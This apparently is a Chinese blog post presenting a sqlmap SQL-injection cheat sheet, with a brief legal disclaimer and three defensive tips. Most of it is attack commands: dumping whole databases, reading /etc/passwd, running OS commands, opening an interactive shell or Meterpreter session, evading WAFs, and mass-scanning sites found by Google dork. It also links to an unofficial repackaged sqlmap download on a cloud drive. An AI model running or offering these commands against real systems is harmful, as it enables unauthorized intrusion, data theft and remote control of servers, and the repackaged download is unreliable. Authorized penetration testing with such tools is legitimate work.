SQLMap 终极渗透手册(2025全功能版)

超防局2025-10-25 10:26

目录

[⚠️ 法律声明](#⚠️ 法律声明)

工具下载

[🔍 基础侦查](#🔍 基础侦查)

[📂 数据枚举](#📂 数据枚举)

层级式渗透

批量操作

[🛠️ 高级功能](#🛠️ 高级功能)

[1. 权限提升](#1. 权限提升)

[2. 系统命令执行](#2. 系统命令执行)

[3. 绕过WAF](#3. 绕过WAF)

[🎯 实战场景](#🎯 实战场景)

场景1:Cookie注入

场景2:POST注入

场景3:谷歌黑客批量检测

[📊 结果管理](#📊 结果管理)

[⚡ 效率优化](#⚡ 效率优化)

[⚠️ 防护建议](#⚠️ 防护建议)

⚠️ 法律声明

所有技术仅限授权测试使用!未经授权渗透属于违法行为。

工具下载

我用夸克网盘给你分享了「sqlmap_CN.zip」,点击链接或复制整段内容,打开「夸克APP」即可获取。

/~339038pE3e~:/

链接:https://pan.quark.cn/s/0d3faddb83b2

🔍 基础侦查

|-------------------|---------|-----------------------------------------|
| 命令 | 功能 | 示例 |
| sqlmap -u "url" | 基础检测 | sqlmap -u "http://test.com/news?id=1" |
| --current-user | 当前数据库用户 | sqlmap -u "url" --current-user |
| --current-db | 当前数据库 | sqlmap -u "url" --current-db |
| --dbs | 列出所有数据库 | sqlmap -u "url" --dbs |

📂 数据枚举

层级式渗透

复制代码 
# 1. 获取数据库
sqlmap -u "http://test.com/news?id=1" --dbs

# 2. 获取表
sqlmap -u "http://test.com/news?id=1" --tables -D "数据库名"

# 3. 获取字段
sqlmap -u "http://test.com/news?id=1" --columns -T "表名" -D "数据库名"

# 4. 导出数据
sqlmap -u "http://test.com/news?id=1" --dump -C "字段名" -T "表名" -D "数据库名"

批量操作

复制代码 
# 导出整个数据库
sqlmap -u "http://test.com/news?id=1" --dump-all --exclude-sysdbs

# 导出指定范围数据
sqlmap -u "http://test.com/news?id=1" --dump -T "users" -D "app_db" --start=1 --stop=100

🛠️ 高级功能

1. 权限提升

复制代码 
# 检测是否为DBA
sqlmap -u "url" --is-dba

# 获取系统文件(需要高权限)
sqlmap -u "url" --file-read="/etc/passwd"

2. 系统命令执行

复制代码 
# 执行单条命令
sqlmap -u "url" --os-cmd="whoami"

# 获取交互式Shell
sqlmap -u "url" --os-shell

# 获取Meterpreter会话(需Metasploit)
sqlmap -u "url" --os-pwn --msf-path=/opt/metasploit

3. 绕过WAF

复制代码 
# 使用TAMPER脚本
sqlmap -u "url" --tamper="space2comment"

# 设置延迟
sqlmap -u "url" --delay=3

# 随机UA
sqlmap -u "url" --random-agent

🎯 实战场景

场景1:Cookie注入

复制代码 
sqlmap -u "http://test.com/login" --cookie="PHPSESSID=1234" --level=3

场景2:POST注入

复制代码 
sqlmap -u "http://test.com/login" --data="username=admin&password=123"

场景3:谷歌黑客批量检测

复制代码 
sqlmap -g "inurl:.php?id=" --batch --smart

📊 结果管理

复制代码 
# 保存进度
sqlmap -u "url" --output-dir=/root/sqlmap_results

# 恢复进度
sqlmap --resume -l /root/sqlmap_results/log

效率优化

复制代码 
# 多线程扫描
sqlmap -u "url" --threads=5

# 仅检测不攻击
sqlmap -u "url" --dbs --batch --smart

⚠️ 防护建议

  1. 使用参数化查询
  2. 最小化数据库权限
  3. 部署WAF防护

💡 提示:

  • 使用-v 3查看详细过程
  • 复杂环境下添加--flush-session清除缓存
  • 首次测试建议从--level=1 --risk=1开始

👉 按需组合命令参数,注意操作风险! 🚀

相关推荐
百***17076 小时前
Oracle分页sql
数据库·sql·oracle
阿乐艾官7 小时前
【十一、Linux管理网络安全】
linux·运维·web安全
llxxyy卢7 小时前
upload-labs(1-13)(配合源码分析)
web安全
jenchoi4139 小时前
【2025-11-12】软件供应链安全日报:最新漏洞预警与投毒预警情报汇总
网络·安全·web安全·网络安全·npm
2301_800256119 小时前
关系数据库小测练习笔记(1)
1024程序员节
好记忆不如烂笔头abc12 小时前
sql评估存储的速度和稳定性
数据库·sql
朝新_12 小时前
【实战】动态 SQL + 统一 Result + 登录校验:图书管理系统(下)
xml·java·数据库·sql·mybatis
jenchoi41313 小时前
【2025-11-13】软件供应链安全日报:最新漏洞预警与投毒预警情报汇总
网络·安全·web安全·网络安全·npm
z10_1414 小时前
动态住宅IP和静态住宅IP哪个更好
网络·tcp/ip·web安全
Fnetlink114 小时前
多云架构时代:解码企业网络安全的全新基因
安全·web安全·架构
热门推荐
01GitHub 镜像站点02BongoCat - 跨平台键盘猫动画工具03UV安装并设置国内源04安娜的档案(Anna’s Archive) 镜像网站/国内最新可访问入口(持续更新)05Linux下V2Ray安装配置指南06综合整理:pdf预览显示:你尝试预览的文件可能对你的计算机有害。如果你信任此文件以及其来源,请打开此文件以看其内容,如何解决以正常预览文件07jdk21下载、安装(Windows、Linux、macOS)08使用国内镜像网站在线下载安装Qt(解决官网慢的问题)——Qt09MiniMax-M2 全方位配置手册:覆盖 Claude Code, Cursor, Cline 等工具10Labelme从安装到标注:零基础完整指南